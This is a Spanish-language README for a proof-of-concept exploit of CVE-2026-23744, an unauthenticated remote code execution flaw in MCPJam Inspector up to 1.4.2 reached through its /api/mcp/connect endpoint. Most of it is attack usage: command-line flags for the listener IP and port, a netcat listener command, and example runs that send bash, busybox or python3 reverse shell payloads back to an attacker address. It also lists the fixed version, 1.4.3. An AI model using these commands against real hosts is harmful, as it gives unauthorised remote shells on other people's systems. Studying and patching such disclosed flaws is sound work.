
CVE-2026-23744 — Prueba de concepto de explotación para una vulnerabilidad de ejecución remota de código sin autenticación en MCPJam Inspector <= 1.4.2.
MCPJam Inspector <= 1.4.2 se vincula a 0.0.0.0 por defecto y expone /api/mcp/connect sin requerir autenticación. El endpoint acepta un objeto serverConfig que lanza un proceso directamente en el host; enviar un payload de reverse shell otorga RCE inmediato sin necesidad de credenciales.
pip install requests
python3 exploit.py -u <target_url> -i <lhost> -p <lport> [-m <method>]
| Flag | Descripción | Por defecto |
|---|---|---|
-u | URL del objetivo | obligatorio |
-i | IP de tu listener (LHOST) | obligatorio |
-p | Puerto de tu listener (LPORT) | obligatorio |
-m | Método de payload: busybox, bash, python3 | busybox |
Paso 1 — Inicia tu listener:
nc -lvnp 4444
Paso 2 — Ejecuta el exploit:
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash
Si busybox no funciona en el objetivo, prueba los otros métodos:
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash
| Software | Vulnerable | Corregida |
|---|---|---|
| MCPJam Inspector | <= 1.4.2 | 1.4.3 |